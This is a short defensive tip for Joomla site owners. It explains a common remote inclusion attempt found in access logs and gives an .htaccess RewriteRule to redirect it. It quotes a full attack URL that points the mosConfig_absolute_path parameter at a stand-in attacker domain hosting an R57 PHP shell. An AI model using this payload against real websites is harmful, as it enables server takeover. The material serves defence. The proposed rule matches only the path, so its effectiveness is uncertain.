One of the most common break-in attempts in Joomla is by appending a string onto a URL, which in effect attempts to run some malicious script remotely. This method is known as a command injection attack. In most cases, this takes the form of the following URL in the access logs:

//?mosConfig_absolute_path=http://www.attackersdomain.com/some_folder/R57.txt???

The R57.txt??? part is a .php shell script. The purpose of this attack is to have the PHP shell script executed on your web server, giving the attacker control over various parts of your website.

In order to redirect any requests containing the character string "R57.txt???" to your main page at http://www.yourdomain.com, you have to open your .htaccess file and add the following lines in it:

# redirect any variations of a specific character string to a specific address

RewriteRule ^R57.txt http://www.yourdomain.com/ [R]